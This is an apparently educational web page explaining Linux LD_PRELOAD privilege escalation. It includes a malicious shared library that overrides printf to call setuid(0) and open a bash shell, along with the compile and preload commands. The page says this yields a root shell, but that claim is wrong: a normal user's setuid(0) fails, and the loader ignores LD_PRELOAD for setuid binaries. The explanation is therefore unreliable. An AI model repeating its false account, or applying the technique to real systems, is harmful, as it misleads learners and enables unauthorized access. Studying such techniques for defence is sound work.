ld.so privesc exploit example

👉 Overview

👀 What ?

Linux ld.so privilege escalation exploit is a security vulnerability that manipulates the dynamic linker/loader ld.so of the Linux operating system to escalate privileges from a normal user to root user.

🧐 Why ?

Understanding this exploit is crucial because it sheds light on how certain system vulnerabilities can be exploited to gain unauthorized access or privileges. This knowledge is essential for system administrators, security professionals and ethical hackers to secure their systems.

⛏️ How ?

The exploit involves tricking the linker/loader ld.so into executing a malicious library or a script. This can be achieved by setting the LD_PRELOAD environment variable to point to the malicious library or script. Once the system runs a binary that requires the ld.so, it will also execute the malicious script, potentially with escalated privileges.

⏳ When ?

The use of Linux ld.so privilege escalation exploit began to be noticed in the early 2000s. However, its popularity among hackers has grown over the years due to the ubiquity of Linux systems and the relative simplicity of the exploit.

⚙️ Technical Explanations

The Linux ld.so privilege escalation exploit involves manipulating the ld.so dynamic linker/loader in a Linux system.

The ld.so is a critical part of a Linux system as it loads the shared libraries required by a program into the program's memory space during runtime. These shared libraries typically contain common functions and routines that multiple programs may use, eliminating the need for these to be included in every individual program.

The exploit occurs when a malicious user creates a malevolent shared library and uses the LD_PRELOAD environment variable to instruct the linker/loader to load this library before any others when a program is run. It's important to note that the LD_PRELOAD variable is a feature, not a bug, of the Linux operating system - its legitimate purpose is to allow users to test new versions of libraries or to debug library-related issues.

The malevolent library can be constructed to contain functions that are also found in other, legitimate libraries used by the program. Since the ld.so loads the libraries in the order specified by the LD_PRELOAD variable, the functions in the malevolent library will be used in place of the legitimate ones.

The exploit's danger lies in its potential for arbitrary code execution - because the malicious functions are executed in the context of the user running the program, they inherit the user's permissions. Therefore, if a program run by the root user (who has all administrative permissions) is targeted, the exploit could lead to a full system compromise.

This exploit has been known since the early 2000s and continues to be relevant due to the widespread use of Linux systems and the simplicity of the exploit. Any Linux system user, especially system administrators and security professionals, should be aware of this exploit to protect their systems effectively.

Example of a Linux ld.so Privilege Escalation Exploit:

Let's say we have a simple C program called targetProgram.c that uses the printf function from the libc.so library.

#include <stdio.h>

int main() {
    printf("Hello, world!\\n");
    return 0;
}

A malicious user might create a library, say exploitLib.c, that contains their own version of the printf function:

#include <stdio.h>
#include <unistd.h>

int printf(const char *format, ...) {
    setuid(0); // Elevate to root privileges
    system("/bin/bash"); // Run a bash shell
    return 0;
}

The malicious user then compiles this library into a shared object file:

gcc -shared -o exploitLib.so exploitLib.c

The malicious user can then set the LD_PRELOAD environment variable to point to the malicious library:

export LD_PRELOAD=/path/to/exploitLib.so

Now, when the target program is run, the malicious printf function will be executed instead of the legitimate one:

./targetProgram

This will open a bash shell with root privileges, enabling the malicious user to perform any actions they want on the system.

Note: This example is for educational purposes only. Attempting such an exploit on a system without permission is illegal.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.